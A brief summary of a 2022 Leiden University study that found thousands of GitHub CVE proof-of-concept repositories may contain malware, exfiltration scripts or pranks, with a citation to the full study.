A POC helps reproduce a vulnerability, but there are no guarantees that its source is reliable. Some are fake, and some contain malicious code. With a heuristic approach, a study found that 4.893 out of the 47.313 examined GitHub repositories may have malicious intent.
The malicious POCs may contain malware able to attack the local host or an exfiltration script to export information somewhere else. Sometimes they are just a prank.
Full study: Soufian El Yadmani, Robin The, Olga Gadyatskaya (2022) How security professionals are being attacked: A study of malicious CVE proof of concept exploits in GitHub. Leiden Institute of Advanced Computer Science, Leiden University